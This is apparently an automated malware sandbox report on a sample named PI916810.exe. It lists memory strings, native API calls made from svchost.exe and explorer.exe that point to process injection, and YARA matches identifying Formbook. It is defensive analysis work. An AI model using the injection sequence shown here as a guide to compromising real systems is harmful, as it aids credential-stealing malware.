          Source: PI916810.exe, 00000000.00000000.2017626388.0000000000515000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_42b3428e-d
          Source: PI916810.exe, 00000000.00000000.2017626388.0000000000515000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_30b3c8b0-e
          Source: PI916810.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a7b7f188-3
          Source: PI916810.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_eac676c2-f
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A31D NtCreateFile,2_2_0041A31D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A44A NtClose,2_2_0041A44A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_03972BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,LdrInitializeThunk,2_2_03972AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_03972F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,LdrInitializeThunk,2_2_03972FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,LdrInitializeThunk,2_2_03972FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,LdrInitializeThunk,2_2_03972F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_03972E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_03972EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,LdrInitializeThunk,2_2_03972DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,LdrInitializeThunk,2_2_03972D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_03972D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_03972CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,2_2_03972C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,2_2_039735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,2_2_038AA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AA042 NtQueryInformationProcess,2_2_038AA042
          Source: C:\Windows\explorer.exeCode function: 3_2_1060B232 NtCreateFile,3_2_1060B232
          Source: C:\Windows\explorer.exeCode function: 3_2_1060CE12 NtProtectVirtualMemory,3_2_1060CE12
          Source: C:\Windows\explorer.exeCode function: 3_2_1060CE0A NtProtectVirtualMemory,3_2_1060CE0A
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C4021: CreateFileW,DeviceIoControl,CloseHandle,0_2_004C4021
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004B8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004B8858
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004C545F
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0046E8000_2_0046E800
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0048DBB50_2_0048DBB5
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0046FE400_2_0046FE40
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004E804A0_2_004E804A
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0046E0600_2_0046E060
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004741400_2_00474140
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004824050_2_00482405
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004965220_2_00496522
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004E06650_2_004E0665
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0049267E0_2_0049267E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004768430_2_00476843
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0048283A0_2_0048283A
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004989DF0_2_004989DF
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00478A0E0_2_00478A0E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004E0AE20_2_004E0AE2
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00496A940_2_00496A94
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004BEB070_2_004BEB07
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C8B130_2_004C8B13
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0048CD610_2_0048CD61
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004970060_2_00497006
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0047710E0_2_0047710E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004731900_2_00473190
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004612870_2_00461287
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004833C70_2_004833C7
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0048F4190_2_0048F419
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004816C40_2_004816C4
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004756800_2_00475680
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004758C00_2_004758C0
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004878D30_2_004878D3
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00481BB80_2_00481BB8
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00499D050_2_00499D05
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_00481FD00_2_00481FD0
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_0048BFE60_2_0048BFE6
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_010FECA00_2_010FECA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D89D2_2_0041D89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C3F22_2_0041C3F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E4C2_2_00409E4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E79D2_2_0041E79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AA0362_2_038AA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AB2322_2_038AB232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038A10822_2_038A1082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE5CD2_2_038AE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038A5B322_2_038A5B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038A5B302_2_038A5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038A89122_2_038A8912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038A2D022_2_038A2D02
          Source: C:\Windows\explorer.exeCode function: 3_2_1060B2323_2_1060B232
          Source: C:\Windows\explorer.exeCode function: 3_2_1060A0363_2_1060A036
          Source: C:\Windows\explorer.exeCode function: 3_2_106010823_2_10601082
          Source: C:\Windows\explorer.exeCode function: 3_2_10605B303_2_10605B30
          Source: C:\Windows\explorer.exeCode function: 3_2_10605B323_2_10605B32
          Source: C:\Windows\explorer.exeCode function: 3_2_10602D023_2_10602D02
          Source: C:\Windows\explorer.exeCode function: 3_2_106089123_2_10608912
          Source: C:\Windows\explorer.exeCode function: 3_2_1060E5CD3_2_1060E5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10B940823_2_10B94082
          Source: C:\Windows\explorer.exeCode function: 3_2_10B9D0363_2_10B9D036
          Source: C:\Windows\explorer.exeCode function: 3_2_10BA15CD3_2_10BA15CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10B9B9123_2_10B9B912
          Source: C:\Windows\explorer.exeCode function: 3_2_10B95D023_2_10B95D02
          Source: C:\Windows\explorer.exeCode function: 3_2_10B9E2323_2_10B9E232
          Source: C:\Windows\explorer.exeCode function: 3_2_10B98B303_2_10B98B30
          Source: C:\Windows\explorer.exeCode function: 3_2_10B98B323_2_10B98B32
          Source: C:\Users\user\Desktop\PI916810.exeCode function: String function: 00467F41 appears 35 times
          Source: C:\Users\user\Desktop\PI916810.exeCode function: String function: 00480D27 appears 70 times
          Source: C:\Users\user\Desktop\PI916810.exeCode function: String function: 00488B40 appears 42 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 280 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
          Source: PI916810.exe, 00000000.00000003.2031782718.000000000391D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI916810.exe
          Source: PI916810.exe, 00000000.00000003.2030240477.0000000003773000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PI916810.exe
          Source: PI916810.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
